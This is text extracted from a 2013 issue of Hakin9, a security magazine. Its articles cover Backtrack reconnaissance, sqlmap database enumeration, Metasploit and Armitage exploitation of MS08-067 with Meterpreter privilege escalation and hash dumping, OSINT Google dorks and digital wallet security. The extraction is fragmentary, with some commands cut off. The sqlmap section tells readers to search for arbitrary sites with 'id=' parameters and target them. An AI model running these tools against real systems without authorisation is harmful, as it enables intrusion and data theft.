Hakin9 OPEN 04 2013
Hakin9 OPEN 04 2013
Hakin9 OPEN 04 2013
Dear Readers,
Editor in Chief:
Ewelina Nazarczuk
[email protected]
team
DISCLAIMER!
04/2013
CONTENTS
How a Vulnerability
Exploitation Works?
14
www.hakin9.org/en
24
Web Application
Penetration Testing
With Backtrack
Industries always prefer for open source tools that
basically used for penetration testing and vulnerability
assessment of Web Applications. First choice for
penetration tester is Backtrack and latest version is kali.
Backtrack is a operating system that consist some open
source tool which is built in different languages such as
python, perl and ruby which offer better results from Web
Application penetration testing prospect. In My Article i
am going to cover most of the tool which is used for Web
Application Penetration Testing.
Introduction
Figure 1. Dnsenum.pl
04/2013
Dnsenum.pl
Is multithread script to enumerate information on a
domain and to discover non-contiguous ip blocks
and dns records.This tool is also used for zone
transfers. Command and output E.g (Figure 1) as
you see in above diagram because of security issues we havn,t disclose the name of domain and
its records.
We used the simple command that is ./dnsenum.
pl targedomain.com.
DNSMap tool
Is another important tool which we can used to find
subdomain we need to check whether that domain
have subdomain and running which kind of web
application (Figure 2).
as you see in above diagram because of security
issues we havn,t disclose the name of domain and
its records.
We used the simple command that is ./dnsmap
targedomain.com.
DNSRecon
This tool is written in Ruby language the dnsrecon
can be used to:
Reverse lookup for range.
Expand a top level domain.
Brute force DNS Host and Domain using a
wordlist.
Query the NS, SOA, and MX records.
Performed zone transfer on each NS server reported (Figure 3).
Figure 4. NetCat
Figure 3. DNSRecon
www.hakin9.org/en
Figure 5. Nmap
nmap -sO
targetdomain.com
targetdomain.com
Figure 6. http-enum.nse
Directory listing and mirroring of website play a vital role for the penetration testing of Web Application. We can get the idea how directory structer
in Web Application. With the Help of Backtrack
tool we can try to do mirroring of website because
some website protected with robots.txt which not
allowed to browse the entire directory.
Nmap Commands
In Nmap first we need to find the directory of nmap
scripts. Open the Script Directory = root@bt: cd /
opt/framework/share/nmap/scripts#.
Command
= nmap --script http-enum.nse -p80 targetdomain.com
Figure 7. Webshag
Webshag
Webshag is a tool in backtrack which is used for
web security audit.Here we used webshag for
webcrawling and directory listing.
To Open WebShag Please follow step: Backtrack => Information Gathering => Web Application
Analysis =>WebCrawler=>webshag-gui.
As Per Diagram once you open webshag you
need to move your cursor to Spider menu once you
go to spider menu in the setting Target you must
mention the name of the target (targetdomain.com).
You have to open same targetdomain website in
your browser and then go to click OK (Figure 7).
Directory Listing With Metasploit
Please go through the steps to performed directory
Listing With Metasploit
Open Metasploit
We need to Select Scanner of Directory Listing
and the command is
04/2013
In this Publication We will discuss how to enumerate the different type of database and try to fetch
records with open source tool which is avail in
Backtrack
Enumerating Types,Version and Ports of Database
Enumerating and Bruteforcing Database Admin
Accounts
Enumerating Records from Databases
In this Modules we will Demonstrate how to enumerate database type,version and open port of databases with the help of Backtrack tool.
NMAP
First We need to identify type of database and
there port
Command is = nmap -sT -sC 192.168.1.6
www.hakin9.org/en
Step 4
Sql Database Enumeration With SQLMAP. sqlmap
is python based tool which is used for enumerating
and penetration testing of databases.Please follow
the steps to enumerate and penetrate into the databases
Step 1 = Try to search anything relared to id
e.g trainers.php?id=
You will get plenty amount of link of website
which end up with id=1 or other value
Go to Backtrack =>Exploitation Tool =>Database
Exploitation =>MysqlExploitation =>Sqlmap
Type the following syntax (Ustand for url)
./sqlmap.py
php?id=14
-u
http://www.web.com/viewpacu.
Once you find the databases select the specific database and try to enumerate the table of
that database and the command is ./sqlmap.py
-u
http://www.web.com/viewpacu.php?id=14-D
mani
--tables
Step 5
Enumerating Oracle Database With Metasploit
first we need to identify 1521 port is open on
target if its open it mean they running oracle
server
To identify we need to run nmap and type the
following command nmap -sV 20.0.0.1 -p 1521
once we find the 1521 port is open then we
need to open metasploit to enumerate which
oracle version they are using and the command is msf > use auxiliary/scanner/oracle/
tnslsnr _ version
msf
wordlists/user.txt
select the passwordfile that consist the password list set pass _ file /opt/metasploit/msf3/
data/wordlists/pass.txt
10
04/2013
extension
>
set
msf
>
set
RHOST 20.0.0.1
In Backtrack We have multiple tools which do fingerprinting and vulnerablity Assessment for Web
Application
Content Management System Identification
and Vulnerability Assessment
Identification loadbalancer and Web Application Firewall
www.hakin9.org/en
11
12
04/2013
Prabhakaran Nair
CEH, ECSA, CHFI, OPST, OPSA
Information Security Consultant Working
With Koenig Solutions Ltd
advertisement
How a Vulnerability
Exploitation Works?
In the follow article, We reveal step by step how a
vulnerability exploitation works using the free powerful
port scanner Nmap and the exploitation tool Metasploit
Framework MSF, booth integrated under same graphical
user interface; Armitage easy GUI managing for all users.
14
04/2013
www.hakin9.org/en
15
Now we can perform many all those types of attacks shown in the attack menu attached, we are
going to exploit a well known vulnerability CVE2008-4250 so we choose Attack/smb/MSB-MS08067-netapi. This module exploits a parsing flaw
in the path canonicalization code of NetAPI32.dll
through the Server Service. This module is capable of bypassing NX on some operating systems
and service packs. Settings are: LHOST local host
ip; LPORT: local port; RHOST: Remote Host ip;
RPORT: Remote port; SBMPIPE: Portocol. Settings are already configured, just hit Launch.
Now we are going to To interact with the desktops targeted host, go to Meterpreter/Interact/
Desktop (VNC). This will stage a VNC server into
the memory of the current process and tunnel the
connection through Meterpreter. The system will
provide you the details to connect a local VNC client to your target as seen in the screenshot
16
04/2013
And thats all, by this way We can manage remotely in graphics mode the compromised host
through VNC.
For more information about vulnerabilities and
exploits, here is an updated table with effective Exploits pack (https://docs.google.com/spreadsheet/
ccc?key=0Agsv3XWFKSPEdFMyM2RqT2ZVRH
RuSDlrejRMTEhVV2c&usp=sharing).
Jorge Mario
Awareness & Security Research
@nms_george
Websolutions Colombia Co-founder
ScamBox Founder
@scamboxcol
advertisement
Meta-Fast
And Meta-Furious
A quick hands-on description through the hacking cicle
using Armitage and the metasploit framework.
Tools you will need to practice with the contents described
in this article: BACKTRACK 5R3 with Metasploit and
Armitage.
18
04/2013
Ok then, now that we have Armitage up and running we will start by doing the basics of the hacking cycle.
Reconnaissance
Say you are on a local network with your pentesting lab inside. The first thing you would want to
know is what systems are alive and available. You
can do that by using the very famous networking
tool named NMAP. The best thing about Armitage
is that you can call several options and different
tools from within Armitage itself.
To call nmap just go to the Host menu, select
NMAP SCAN and choose one of the options avail-
When the quick scan is done, you will be prompted with a Complete! message box and if the scan
found any live system, it will present it something
like the Figure 5.
www.hakin9.org/en
19
Scanning
logo picture on it. Armitage does this to inform visually about some of the results. Right click the
target again and choose services. This will list
you the services available at the target. The result
is shown in Figure 6.
Gaining access
20
04/2013
Privilege scalation
Right click on the target system and head to the meterpreter option Access Escalate Privileges.
The use of this technique is very usefull if you
have restricted or user-level privileges. Metasploit
will attempt to give you SYSTEM privileges so you
can have total control within the system.
Dump Hashes
Screenshot
Within the explore menu you will have several interesting options (Figure 11). Screenshot will give you
an instant real time picture of the targets screen.
The last option is not the least important. The command shell for seasoned pentesters is all they
need to control the entire system. The power of
meterpreter resides on automating and making
things very easy and fast that in other way would
www.hakin9.org/en
21
22
04/2013
A BZ Media Event
Over 60
San Francisco
October 15-17, 2013
www.BigDataTechCon.com
f you need a flat head screwdriver to remove a screw, would you use a cross head?
Of course you wouldnt it wouldnt work
for one reason. Similarly, if you needed to dig a
hole would you use a spoon? While youd get
the job done the time wasted could be better invested elsewhere. Its only natural to use the
tool thats been perfectly designed for the job
yet, for some reason, when it comes to securing
the corporate infrastructure, many are frightened
by the idea of hiring a hacker. I believe theyre
missing out.
In a previous article I discussed the term ethical
hacker and, while I dont intend on regurgitating
the theme here, it is worth just reminding you that
I believe you should call a spade a spade and a
hacker a hacker ethics is irrelevant. I also define
a hacker as someone who thinks a certain way
about technology. For that reason, if you want to
make sure your systems are secure then the best
way is to test their strength and that would be best
done by someone who thinks a certain way about
technology.
That said, not all hackers are the same so here
are the skills, I believe, a hacker should display:
My hacker definition sums this up perfectly. Rather than looking at how something should work,
24
a hacker will approach it from a different angle. He wont try your security doors to make
sure theyre locked, but instead push on the wall
around it to see if the bricks hold up and if the
windows have glass does the putty hold them
in place.
Tenacity is another key skill a hacker must possess someone who doesnt take no for an answer. Take a locked door there are a number of
ways of opening it and a hacker will keep trying
until he manages it. Of course the easiest way is
to locate the key but, if one isnt on hand, then can
the lock be picked? Can it be drilled? What about
cutting the lock out altogether? I think the phrase
from a legendary film Youre only supposed to
blow the bloody doors off perfectly encapsulates a
hackers enthusiasm to get the job done.
04/2013
While Ive said theres no reason why a rehabilitated hacker shouldnt be employed, it does raise serious concerns primarily, why did they get caught?
Professional hackers will pride themselves on their
skill at infiltrating systems, undetected, and will
certainly not want to leave an electronic fingerprint. A criminal conviction shouldnt be seen as
a qualification but rather testament that perhaps
theyre not up to the job!
A big head
Dominique Karg
Chief Hacking Officer at AlienVault
advertisement
How Could
Organisations
Leverage Open-Source Intelligence To Gain More Insight
Into Their Cyber Threats?
It Seems To Me That Many organisations, including some
of the largest ones, do not sufficiently utilise the opensource intelligence capabilities available online in order to
gain further insight into their own cyber security threats. By
adopting even basic techniques, organisations may be able
to improve their detection time and responsiveness to at
least some of their cyber threats.
he well known 2013 Data Breach Investigations Report (DBIR) from Verizon provides
an in-depth analysis of a broad range of security breaches and sheds some light on the circumstances under which they were detected. According to the report, the span of time from the
initial compromise to the moment when the victim
organisation discovered the incident was a matter
of months or even more for 66% of the incidents
that were investigated. Thats a pretty long time for
a compromised system and sensitive information
to be at the disposal of bad guys while still going
unnoticed! Along with these alarming figures, the
report shows some suggestive indicators on how
the breaches initially get discovered by the victim.
Third parties discover data breaches much more
frequently than the breached victims do (respectively 69% and 31%). Incidents categorised as reported by a third party include those learned from
law enforcement agencies, clients, partners and
other external parties. That looks very bad, doesnt
it? And these are just the incidents we know about,
while some other cyber crimes may have been flying under the radar. A key question here is how
could these detections have turned out better?
26
04/2013
Could Organisations
businesses just cant afford that luxury. On the other hand, SIEM is more generally limited to generating intelligence from internal sources within the
perimeter network. Supporting collection mechanisms often do not integrate nicely with unstructured external data sources.
In the light of todays fast-paced cyber threat landscape and the emergence of Advanced Persistent Threat (APT), security vendors and providers are bringing new threat intelligence solutions
on the table. Rather than just providing CERT,
SANS and vendors advisories on the latest ongoing threats, they tend to aggregate supplementary
restricted data sources, such as honeypots, malware zoos, vendors managed devices and other
endpoints, giving a better understanding of whats
going on down on the wire. By doing so in conjunction with contextual analysis, the vendor may
provide its customer with an actionable threat intelligence feed related to corporate IP addresses,
domain names, sensitive URLs, file content, etc.
Some of these new services may probably pay off
and help in uncovering quite a few APTs in some
cases. They might be especially worthwhile when
offered by big players in telco, managed services
or enterprise security products arenas. The larger
their infrastructures scale, the wider their field of
view is likely to be.
With this in mind, some forms of Open-Source Intelligence (OSINT) mechanisms could be embedded into the corporate threat intelligence strategy and connect the dots with the other layers.
Although OSINT has been traditionally used by
government and military agencies, some of the
underlying techniques may be suitable in other
www.hakin9.org/en
filetype:xls
or
site:www.MyOrg.com
administrator_login.asp.
inurl:
27
All kind of business may see advantages in implementing OSINT mechanisms. While many large
organisations focus their efforts on implementing
a comprehensive (and expensive) SIEM system,
some may balance their investments with other
forms of cyber threat intelligence. As with other
information security investments, OSINT initiatives should follow a risk-based and cost-effective
approach. For instance, a major defence corporation may be interested in a more ambitious OSINT
program than a small toy manufacturing company. The first one might be a juicier target than the
second one. It may implement complex and highly
customised OSINT techniques focusing on several criteria, including, but not limited to, key stakeholders and executives details, sensitive projects,
IP address ranges, domain names, URLs, etc.
Small businesses, which cant easily afford SIEM
or costly cyber threat intelligence solutions, could
find worth considering simple OSINT techniques
similar to some of those outlined above. As with
other cyber threat intelligence mechanisms, bear
in mind that OSINT wont uncover all of the ongoing threats. The simplest mechanisms might uncover just a small few of those. They may however come at minimal cost, so why not to go with
them? Just think about it as a component of a
multi-layered threat detection or cyber threat intelligence strategy.
Conclusion
It is clear today that traditional (and expensive) security protections like signature-based and walland-fortress approaches are not enough anymore
in protecting against emerging cyber threats. Organisations should move towards new approaches to fill the gaps in their traditional security arsenal. As has been seen, no single solution will fill
all gaps; organisations should rather seek for a
combination of several ones by adopting a multilayered approach. Although they have been tradi-
28
Laurent Mathieu
CISSP, is an information security consultant. Hes been in the
security industry for more than 9 years, serving both the private and public sectors in Europe. He has hands-on cybersecurity experience, having worked in CERT and SOC environments for years.
04/2013
U P D AT E
NOW WITH
STIG
AUDITING
IN SOME CASES
nipper studio
HAS VIRTUALLY
REMOVED
the
NEED FOR a
MANUAL AUDIT
CISCO SYSTEMS INC.
Titanias award winning Nipper Studio configuration
auditing tool is helping security consultants and enduser organizations worldwide improve their network
security. Its reports are more detailed than those typically
produced by scanners, enabling you to maintain a higher
level of vulnerability analysis in the intervals between
penetration tests.
Now used in over 45 countries, Nipper Studio provides a
thorough, fast & cost effective way to securely audit over
100 different types of network device. The NSA, FBI, DoD
& U.S. Treasury already use it, so why not try it for free at
www.titania.com
www.titania.com
Digital Wallet
The New Way of
Exchanging Money?
At todays economy we all are very used to purchase using
debit and credit cards, to use cash or check.
This is about to change, in fact this change is already
happening. Companies like Google, VISA, MasterCard,
PayPal and others are releasing digital wallet solutions to a
demanding market.
30
04/2013
A market overview
Korea has had them for over eight years and Koreans use it frequently so we can say that at least
it has deployments and mass adoption at some
parts of the world and in our fast evolving world,
eight years means a lot on terms of technology
development.
The technology behind the digital wallet is multifaceted. The infrastructure and logistics of the actual
cash transfer is advanced, but the mobile device
technology is fairly simple. Obviously, an important
feature of a digital wallet is that it is accessible from
a mobile device, and in addition to the hardware
and softwareincorporated into the phone, the device may need to be modified in order to scan a
phone at the checkout. There are multiple ways a
digital wallet system can be implemented including
optical scanners, Bluetooth, NFC or RFID tagging.
Well look for the security aspects of those later in
the article.
Its important to understand that the term digital wallet is a wide descriptor for a range of tech-
www.hakin9.org/en
nologies that let you perform many tasks. In general, a digital wallet is an app in the way you pay
for things.
Many digital wallet services work through apps
on your smartphone. At the supermarket, for instance, you might simply tap your phone to a compatible check-out register to pay instantly. For others, all you need to use them is something you
know, such as your mobile phone number and a
PIN (personal identification number).
No matter what form it takes, a digital wallet is
based on encryption software that substitutes for
your old, analog wallet during monetary transactions. You benefit from the protection and convenience. Merchants benefit because theyre more
protected against fraud and they sell more products, faster.
Usually, a Digital Wallet will reside in the client
side of things, the user will simply download a selected app on the his/her device(s) and fill it with
your data and move forward, examples are Apples Passbook (http://www.apple.com/ios/whatsnew/#passbook) and Google Wallet (http://www.
google.com/wallet/) but due to obvious security
reasons plus the need for standardization for a
broader adoption, Server Side Digital Wallets are
gaining momentum.
On this case, the app resides on the vendor
premises (Datacenter, Cloud Service) and the user simply enters his credentials during the purchase phase. One example of a Server-Side Digital Wallet is Visa v.me (https://www.v.me/). As
today Server Side Digital Wallets are being deployed in online web transactions, so for a more
broader view of field implications lets focus on
the Client Side apps what will remain being largely used.
32
04/2013
Is RFID vulnerable?
As RFID is a standard technology and widely adopted, but yes, theres some exploits and techniques in the wild showing how to exploit it.
While many institutions (banks & Governments)
who are rolling out this contact-less technology
claim that their RFID tags are encrypted and secure, we also hear many claims from the hacking
community that these encryptions can & will be
hacked. If you search in Google for RFID hacking
there is literally hundreds of posts. Any RFID reader can be used to read a RFID tag.
Since the tags can be read without being swiped
or obviously scanned (as is the case with magnetic
strips or barcodes), anyone with an RFID tag reader can read the tags embedded in your clothes and
other consumer products without your knowledge.
Also, for various reasons, RFID reader/tag systems
are designed so that distance between the tag and
the reader is kept to a minimum. However, a highgain antenna can be used to read the tags from much
further away, leading to privacy problems.
So, there are plenty of reasons that you should
care about your RFID Security. Now that we know
about the NFC father sins lets move forward and
understand the son own issues.
www.hakin9.org/en
33
34
04/2013
demonstrates some weakness in the NFC protocol. Lets also not mistaken it by a Digital Wallet
application vulnerability. Its NFC protocol related.
Vendors will protect the Data in the Digital Wallet
and many times encrypt the radio communication.
When deciding for a Digital Wallet to use, its important to look not only for the usability of the application but also how it deals with the security aspects of the transaction.
Lets just mention some items you should consider to have on your digital pocket;
Biometry as an authentication method (Apple
acquired sometime ago a company called Authentec that provides Biometric solutions) so
we might see this coming soon as a capability;
Use PIN as a mandatory authentication method at least;
Look for solutions that take advantages of new
chips such as Sonys FeliCa. This chip provides highly secure, very short range, very
low power, extremely easy to set point-to-point
contactless communication between devices.
Encrypt all the data stored on your device with
strong algorithms;
Allow remote erase or quick disable in case of
losing the device
Encrypt all the communication;
Allow alert services (send a message when a
transaction is done)
Readily-available and clear information on how
they collect, store and use your information. A
provider should also make clear whether your
private information will be stored on a physical
device or in the cloud (or both), and how they
are protecting it.
Review the application history (if there are exploits available, the number of times hacking
was detected or the number of times the application was exploited, and the time it took for
the fix to be available.) As a friend of mine always says It only needs to be software to
have bugs
www.hakin9.org/en
serious issues by using the application on a nonsupported environment. Some additional ideas
you should follow on your Digital Wallet device.
Hardware and software manufacturers release frequent updates to optimize performance and security. Stay aware of updates and their impacts, and
ensure they are installed.
Be smart about it activate applications for detecting and removing threats, including firewalls.
Also activate virus and malware detection and intrusion-detection systems.
35
References
Emigh, Jacqueline. Smartphones Are Turning into Wireless Wallets. Brighthand. March 6, 2011. (Jan. 28, 2012)
http://www.brighthand.com/default.asp?newsID=17577
Google. Google Wallet: How it Works. (Jan. 28, 2012) http://www.google.com/wallet/how-it-works.html#in-store
Zebra Technologies. RFID Tag Characteristics. (Feb. 10, 2012) http://www.zebra.com/id/zebra/na/en/index/rfid/faqs/
rfid_tag_characteristics.html
Strickland, Jonathan. How Near Field Communication Works: http://electronics.howstuffworks.com/near-field-communication6.htm
NFC-Forum: http://www.nfc-forum.org/home/
Why is RFID a vulnerable technology?: http://www.armourcard.com.au/why-is-rfid-a-vulnerable-techno
logy/#sthash.44RBCZYh.dpbs
Cockrane, Peter. Lets banish cards and cash and embrace the digital wallet: http://www.wired.co.uk/news/archive/2013-04/25/money-has-always-been-virtual
Hoffman, Chris. From Plastic to Smartphone: When Will Digital Wallets Take Over?: http://www.howtogeek.
com/163132/from-plastic-to-smartphone-when-will-digital-wallets-take-over/
Haselsteiner, Ernst and Breitfu, Klemens. Security in NFC Communications: http://events.iaik.tugraz.at/RFIDSec06/Program/papers/002%20-%20Security%20in%20NFC.pdf
http://sourceforge.net/projects/nfcproxy/
How stuff works? Digital Wallets: http://electronics.howstuffworks.com/gadgets/high-tech-gadgets/digital-wallet.htm
Financial institutions, payment networks and merchants are all needed to make electronic and mobile payments work. Make sure you understand
the quickest way to resolve any issues that arise
and who is responsible for any fraudulent activity
on your account.
This is where rights and liabilities are defined. Topics should address data privacy, opting-in and out
of various features and impacts of enrolling and
canceling accounts and services.
Summary
Vendors
36
Alexandre S. Cezar
Alexandre S. Cezar, CISSP is an experienced Information Security Consultant
and Project Manager with eighteen years
in the Information Security and Network
areas; most of them working for governments, telecom and financial customers
on projects worldwide. Alexandre is a specialist on several
technologies like Next Generation Firewalls, Deep Packet Inspection, Intrusion Prevention Systems, Network Forensics,
DDOS Protection, SIEM tools, virtualization security and operational systems.
04/2013
It isnt about the code, its about what the code can do for you, and
it goes so much further than just a marketing idea. VitreoQR has a
complete array of world class solutions, from marketing to
management, that can help you measure and grow your business.
Whatever your challenge might be, inventory control, counterfeit
prevention, access control systems, supply chain management or
any one of countless other business conditions, VitreoQR can
develop a QR Code driven solution to meet your specic needs. As
a licensee of DENSO Wave QR Code patents, we have all the
necessary tools to make your business more efcient and more
protable through new ideas in 2D barcoding systems.
Explore the possibilities that QR Code technologies offer as real world solutions to even the most
difcult problems. Convey information, manage issues, reach new markets and move more
people into your perspective as you have never been able to do before. There simply isnt
another technology that can do as much for you, at the same value proposition, as a QR Code.
VitreoQR deploys genuine, DENSO Wave QR Codes that are absolutely guaranteed to be fully
compliant with the ISO:18004:2006 specication, delivering to you security and peace of mind.
QRCode
QRPhoto
QRLogo
QRMotion
QRAnalytics
VitreoQR, LLC
12801 Berea Road, Suite F
Cleveland, Ohio 44111 U.S.A.
P. 440.941.2320
E. [email protected]
W. http://vitreoqr.com
QR Code is a Registered Trademark of DENSO WAVE INCORPORATED.
QRCustom
SQRC
In Partnership With
I N V E N T O R O F
T H E Q R C O D E
40
04/2013